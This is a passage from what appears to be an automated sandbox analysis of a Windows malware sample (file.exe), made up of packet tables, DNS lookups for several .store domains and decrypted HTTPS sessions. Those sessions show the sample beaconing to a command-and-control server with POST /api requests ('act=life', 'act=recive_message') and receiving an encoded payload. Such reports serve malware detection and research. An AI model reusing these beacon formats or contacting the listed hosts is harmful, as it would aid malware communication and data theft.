                                                                                Oct 29, 2024 15:27:18.068797112 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.068835020 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.068861008 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.068890095 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.068912029 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.068929911 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.068955898 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.068978071 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.068990946 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.069046974 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.069114923 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.069169044 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.069174051 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.076544046 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.076560974 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.076577902 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.076622009 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.076627970 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.076637983 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.076721907 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.076898098 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.076915979 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.076922894 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.076929092 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.153896093 CET49721443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.154007912 CET44349721188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.154109001 CET49721443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.154589891 CET49721443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.154630899 CET44349721188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.770847082 CET44349721188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.770946980 CET49721443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.772428036 CET49721443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.772463083 CET44349721188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.772732973 CET44349721188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:18.774076939 CET49721443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.774259090 CET49721443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:18.774305105 CET44349721188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:05.884481907 CET44349721188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:05.884572983 CET44349721188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:05.884635925 CET49721443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:05.884784937 CET49721443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:05.884809017 CET44349721188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:06.014408112 CET49970443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:06.014467001 CET44349970188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:06.014544010 CET49970443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:06.015052080 CET49970443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:06.015064955 CET44349970188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:06.625683069 CET44349970188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:06.625816107 CET49970443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:06.629187107 CET49970443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:06.629203081 CET44349970188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:06.629450083 CET44349970188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:06.638632059 CET49970443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:06.638819933 CET49970443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:06.638858080 CET44349970188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:06.638966084 CET49970443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:06.638979912 CET44349970188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:07.248003006 CET44349970188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:07.248073101 CET44349970188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:07.248176098 CET49970443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:07.368309021 CET49970443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:07.368333101 CET44349970188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:07.711766958 CET49977443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:07.711797953 CET44349977188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:07.711903095 CET49977443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:07.712254047 CET49977443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:07.712270975 CET44349977188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:08.340998888 CET44349977188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:08.341216087 CET49977443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:08.343151093 CET49977443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:08.343158960 CET44349977188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:08.343966961 CET44349977188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:08.345324039 CET49977443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:08.345478058 CET49977443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:08.345505953 CET44349977188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:08.345576048 CET49977443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:08.345586061 CET44349977188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:09.079291105 CET44349977188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:09.079555988 CET44349977188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:09.079596043 CET49977443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:09.079641104 CET49977443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:09.407057047 CET49979443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:09.407094002 CET44349979188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:09.407165051 CET49979443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:09.407500982 CET49979443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:09.407517910 CET44349979188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:10.027796030 CET44349979188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:10.027996063 CET49979443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:10.164118052 CET49979443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:10.164132118 CET44349979188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:10.164454937 CET44349979188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:10.165721893 CET49979443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:10.165823936 CET49979443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:10.165828943 CET44349979188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:14.201695919 CET49979443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:14.732100964 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:14.732208967 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:14.732352972 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:14.732645988 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:14.732666016 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.355375051 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.355484962 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.357141972 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.357157946 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.357395887 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.359281063 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.360310078 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.360342979 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.360446930 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.360476971 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.360606909 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.360639095 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.360790014 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.360821962 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.360984087 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.361021042 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.361190081 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.361222982 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.361232996 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.361246109 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.361403942 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.361435890 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.361464977 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.361618996 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.361659050 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.373584032 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.373783112 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.373828888 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:15.373867989 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.373930931 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:15.379621029 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:53.574273109 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:53.574383020 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:53.574476957 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:53.574743986 CET49980443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:53.574754000 CET44349980188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:53.762717009 CET49981443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:53.762758970 CET44349981188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:53.763051987 CET49981443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:53.763528109 CET49981443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:53.763545036 CET44349981188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:54.390151978 CET44349981188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:54.390229940 CET49981443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:54.391937971 CET49981443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:54.391947031 CET44349981188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:54.392183065 CET44349981188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:54.426599026 CET49981443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:54.426676035 CET44349981188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:54.426851988 CET44349981188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:28:54.426907063 CET49981443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:28:54.426924944 CET49981443192.168.2.7188.114.96.3

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 29, 2024 15:27:14.304208994 CET6401353192.168.2.71.1.1.1
                                                                                Oct 29, 2024 15:27:14.314141989 CET53640131.1.1.1192.168.2.7
                                                                                Oct 29, 2024 15:27:14.318176031 CET6396453192.168.2.71.1.1.1
                                                                                Oct 29, 2024 15:27:14.330091953 CET53639641.1.1.1192.168.2.7
                                                                                Oct 29, 2024 15:27:14.348839045 CET6373953192.168.2.71.1.1.1
                                                                                Oct 29, 2024 15:27:14.358756065 CET53637391.1.1.1192.168.2.7
                                                                                Oct 29, 2024 15:27:14.531662941 CET4997453192.168.2.71.1.1.1
                                                                                Oct 29, 2024 15:27:14.548540115 CET53499741.1.1.1192.168.2.7
                                                                                Oct 29, 2024 15:27:14.606142044 CET5793053192.168.2.71.1.1.1
                                                                                Oct 29, 2024 15:27:14.629604101 CET53579301.1.1.1192.168.2.7

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 29, 2024 15:27:14.304208994 CET192.168.2.71.1.1.10xc9aaStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 15:27:14.318176031 CET192.168.2.71.1.1.10x2511Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 15:27:14.348839045 CET192.168.2.71.1.1.10x5bf6Standard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 15:27:14.531662941 CET192.168.2.71.1.1.10x17e0Standard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 15:27:14.606142044 CET192.168.2.71.1.1.10xeb1bStandard query (0)necklacedmny.storeA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 29, 2024 15:27:14.314141989 CET1.1.1.1192.168.2.70xc9aaName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 15:27:14.330091953 CET1.1.1.1192.168.2.70x2511Name error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 15:27:14.358756065 CET1.1.1.1192.168.2.70x5bf6Name error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 15:27:14.548540115 CET1.1.1.1192.168.2.70x17e0Name error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 15:27:14.629604101 CET1.1.1.1192.168.2.70xeb1bNo error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 15:27:14.629604101 CET1.1.1.1192.168.2.70xeb1bNo error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • necklacedmny.store

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.749704188.114.96.34437636C:\Users\user\Desktop\file.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 14:27:15 UTC265OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 8
                                                                                Host: necklacedmny.store
                                                                                2024-10-29 14:27:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                Data Ascii: act=life
                                                                                2024-10-29 14:27:15 UTC1011INHTTP/1.1 200 OK
                                                                                Date: Tue, 29 Oct 2024 14:27:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=eprkv669n1k439lhrcmih2kqau; expires=Sat, 22 Feb 2025 08:13:54 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A3WigEmidnqswZgUgRfTpBL6qe5uDVGUSzTpDr7STNfKLZAJpfM1nkLKDYSMMPgCDEd8gfE87ykn%2FL4bEn34NMOozQiFTdSTfHtriTXROmfCl%2BrJjt04CnkPfVx0P3fTDOz0OUU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8da3d8657f076b82-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1055&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=2623188&cwnd=251&unsent_bytes=0&cid=cb88714eb9625d95&ts=543&x=0"
                                                                                2024-10-29 14:27:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                Data Ascii: 2ok
                                                                                2024-10-29 14:27:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.749715188.114.96.34437636C:\Users\user\Desktop\file.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 14:27:16 UTC266OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 52
                                                                                Host: necklacedmny.store
                                                                                2024-10-29 14:27:16 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                2024-10-29 14:27:18 UTC1019INHTTP/1.1 200 OK
                                                                                Date: Tue, 29 Oct 2024 14:27:17 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=o884h6sd9fmr86colat4gm1lo7; expires=Sat, 22 Feb 2025 08:13:55 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmY9P%2FrouZGvm7d3vHUPzR1GgNSWhkqOJYdRWYiN8v5dldwYB%2FQeDCuRj77H%2F5es9w6aHt81uu0bpVOyF0K%2BDH3xGL2HbfOxxp9EJDOo%2BylrAZLeYsY%2FPJ4fkr4U5rmU8sekWPc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8da3d86d294a6c20-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1194&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=954&delivery_rate=2409317&cwnd=235&unsent_bytes=0&cid=d0be5ef44894dd9c&ts=509&x=0"
                                                                                2024-10-29 14:27:18 UTC350INData Raw: 31 64 38 38 0d 0a 66 6f 62 74 34 63 6f 43 73 6d 53 35 6e 63 67 72 69 36 56 50 57 4e 53 43 61 52 35 4e 66 5a 72 68 4e 4b 78 6f 6c 73 4c 75 61 2f 67 46 70 4a 76 44 38 44 61 65 52 73 72 34 36 68 48 2f 31 7a 6f 39 2b 4b 41 49 65 6d 39 48 2f 49 42 59 33 77 32 36 34 4a 67 47 32 6b 54 67 6a 49 32 35 5a 35 35 47 33 4f 58 71 45 64 44 65 62 54 32 36 6f 46 4d 38 4b 42 66 34 67 46 6a 4f 43 66 32 74 6e 67 65 62 46 75 71 4b 69 61 39 68 31 67 58 56 38 4b 31 4f 37 73 51 6c 4e 72 33 76 41 58 4e 76 55 62 69 45 54 6f 35 53 74 49 2b 4c 48 35 6b 7a 35 35 36 4b 36 48 2b 65 48 35 76 34 70 67 6d 78 68 79 34 39 74 75 34 50 65 69 59 56 38 6f 6c 51 7a 77 7a 38 73 6f 63 4e 6b 42 62 6b 69 59 69 6c 61 4d 49 49 33 2f 65 6d 53 4f 54 45 62 58 54 32 35 78 4d 38 64 31 2b 72 73 56 58 66 47
                                                                                Data Ascii: 1d88fobt4coCsmS5ncgri6VPWNSCaR5NfZrhNKxolsLua/gFpJvD8DaeRsr46hH/1zo9+KAIem9H/IBY3w264JgG2kTgjI25Z55G3OXqEdDebT26oFM8KBf4gFjOCf2tngebFuqKia9h1gXV8K1O7sQlNr3vAXNvUbiETo5StI+LH5kz556K6H+eH5v4pgmxhy49tu4PeiYV8olQzwz8socNkBbkiYilaMII3/emSOTEbXT25xM8d1+rsVXfG
                                                                                2024-10-29 14:27:18 UTC1369INData Raw: 69 59 32 70 62 64 41 55 30 2f 53 68 54 50 76 4d 4a 44 65 37 34 41 5a 32 49 42 7a 34 68 46 7a 45 42 66 36 6b 67 51 53 63 48 4f 54 50 7a 65 68 6e 79 45 61 44 76 34 6c 4d 2b 63 41 68 4c 50 54 61 53 32 4e 68 42 72 69 45 57 6f 35 53 74 4b 69 4a 43 70 6b 58 36 34 79 4c 6f 33 4c 51 46 4e 33 79 72 31 76 76 77 69 4d 77 74 66 49 42 63 69 6b 63 38 59 68 66 79 77 33 77 34 4d 4a 4a 6e 51 53 6b 31 38 4f 4a 62 64 73 4b 30 65 69 71 43 66 61 4a 4e 48 71 78 37 45 73 6b 62 78 76 35 68 31 66 4b 42 50 71 6b 67 41 2b 55 45 65 75 4a 69 61 68 6e 32 67 37 54 2f 71 64 43 35 73 63 6f 4e 37 4c 6d 42 33 30 71 58 37 62 44 55 64 5a 4b 72 4f 43 69 44 70 6b 4f 70 72 71 41 70 6d 37 58 45 4a 76 67 35 46 43 70 77 43 46 36 37 71 41 46 65 53 41 4e 2b 5a 46 54 77 42 6a 34 70 59 6f 45 6d 52 4c
                                                                                Data Ascii: iY2pbdAU0/ShTPvMJDe74AZ2IBz4hFzEBf6kgQScHOTPzehnyEaDv4lM+cAhLPTaS2NhBriEWo5StKiJCpkX64yLo3LQFN3yr1vvwiMwtfIBcikc8Yhfyw3w4MJJnQSk18OJbdsK0eiqCfaJNHqx7Eskbxv5h1fKBPqkgA+UEeuJiahn2g7T/qdC5scoN7LmB30qX7bDUdZKrOCiDpkOprqApm7XEJvg5FCpwCF67qAFeSAN+ZFTwBj4pYoEmRL
                                                                                2024-10-29 14:27:18 UTC1369INData Raw: 6d 37 58 45 4a 76 67 35 46 43 70 77 43 46 36 37 71 41 48 64 53 38 55 38 6f 64 57 79 51 66 78 6f 34 73 4b 6c 78 76 75 67 59 53 73 62 4e 6b 4c 33 66 2b 74 54 65 7a 56 4b 44 4f 36 37 45 73 79 62 78 6a 67 77 77 36 4f 4a 66 4f 32 6a 79 61 5a 44 65 33 50 6e 4f 5a 35 6b 41 48 58 76 2f 49 4a 37 73 49 6c 4d 62 44 6f 43 32 34 71 45 66 4f 43 58 4d 67 4c 2b 61 79 4b 43 5a 73 63 34 6f 4f 44 72 32 66 43 46 4e 37 35 75 45 4f 70 69 57 30 39 72 71 42 54 50 42 6b 50 37 35 4a 41 6a 44 2f 33 72 6f 49 4f 6a 46 7a 37 77 5a 72 6f 5a 39 78 47 67 37 2b 68 53 65 58 41 4a 54 79 79 36 41 52 7a 4a 67 33 35 6a 31 6a 63 44 66 53 70 67 67 61 57 46 65 6d 49 6a 71 4e 71 33 51 4c 63 2f 75 6f 48 71 63 41 31 65 75 36 67 50 57 77 69 45 39 61 49 57 73 64 4b 36 2b 36 56 53 5a 30 51 70 4e 66 44
                                                                                Data Ascii: m7XEJvg5FCpwCF67qAHdS8U8odWyQfxo4sKlxvugYSsbNkL3f+tTezVKDO67Esybxjgww6OJfO2jyaZDe3PnOZ5kAHXv/IJ7sIlMbDoC24qEfOCXMgL+ayKCZsc4oODr2fCFN75uEOpiW09rqBTPBkP75JAjD/3roIOjFz7wZroZ9xGg7+hSeXAJTyy6ARzJg35j1jcDfSpggaWFemIjqNq3QLc/uoHqcA1eu6gPWwiE9aIWsdK6+6VSZ0QpNfD
                                                                                2024-10-29 14:27:18 UTC1369INData Raw: 6e 61 2b 36 39 4d 37 63 41 70 50 4c 6d 67 52 54 77 6f 42 37 6a 62 46 75 45 74 77 65 4b 74 4d 39 6f 44 71 70 62 44 72 32 79 51 58 70 76 7a 71 55 58 68 79 43 73 7a 75 75 6f 43 64 79 4d 55 2f 49 39 66 79 77 7a 31 70 59 6b 49 6e 68 44 75 69 59 43 72 62 39 38 4a 30 37 2f 6b 43 65 37 66 62 57 4c 32 78 52 78 33 49 52 6d 34 6e 42 6a 58 53 76 4f 73 7a 46 48 61 45 4f 32 4a 68 61 31 73 30 51 44 54 2b 71 4a 4e 36 4d 45 72 4f 62 6e 6b 44 6e 30 67 47 2f 53 4e 58 4d 38 4c 2b 4b 75 44 41 70 39 63 71 73 2b 45 73 43 43 49 52 75 72 38 76 46 37 35 79 32 30 6c 2b 50 6c 4c 65 79 4e 66 6f 4d 4e 58 33 41 44 2b 72 6f 6b 47 6e 78 2f 72 69 49 36 75 62 4e 6f 50 30 2f 6d 6c 51 50 76 45 49 54 53 78 37 67 64 79 49 68 58 37 6a 68 61 41 53 76 4f 34 7a 46 48 61 4d 4f 4f 43 72 61 4e 73 31
                                                                                Data Ascii: na+69M7cApPLmgRTwoB7jbFuEtweKtM9oDqpbDr2yQXpvzqUXhyCszuuoCdyMU/I9fywz1pYkInhDuiYCrb98J07/kCe7fbWL2xRx3IRm4nBjXSvOszFHaEO2Jha1s0QDT+qJN6MErObnkDn0gG/SNXM8L+KuDAp9cqs+EsCCIRur8vF75y20l+PlLeyNfoMNX3AD+rokGnx/riI6ubNoP0/mlQPvEITSx7gdyIhX7jhaASvO4zFHaMOOCraNs1
                                                                                2024-10-29 14:27:18 UTC1369INData Raw: 34 43 61 65 48 4b 69 4c 32 75 45 74 4b 4b 41 2f 6f 67 42 54 2f 48 50 65 32 68 77 53 57 58 50 76 42 6d 75 68 6e 33 45 61 44 76 36 78 47 34 4d 51 69 4f 37 2f 73 42 6e 6b 6d 47 76 6d 46 55 73 51 41 39 4b 61 4b 43 4a 38 57 35 34 36 4a 6f 57 66 59 41 64 6a 74 36 67 65 70 77 44 56 36 37 71 41 69 65 7a 30 52 36 4d 4e 4a 67 42 4f 30 70 34 42 4a 77 6c 7a 67 68 59 79 73 5a 39 77 41 33 76 6d 6e 53 4f 62 47 4c 54 57 79 36 77 4a 36 4c 68 4c 39 6a 6c 4c 63 41 50 2b 76 67 41 43 57 45 61 54 42 77 36 39 34 6b 46 36 62 7a 71 64 48 35 38 41 37 65 71 6d 75 45 6a 77 6f 45 37 6a 62 46 73 38 47 2b 36 4f 44 43 70 6b 64 37 70 32 52 70 47 6e 59 41 39 66 30 70 45 2f 37 77 53 49 7a 74 65 4d 43 65 79 63 54 38 6f 42 52 6a 6b 53 30 70 35 52 4a 77 6c 7a 48 6d 4a 4f 6c 49 4d 39 49 77 72
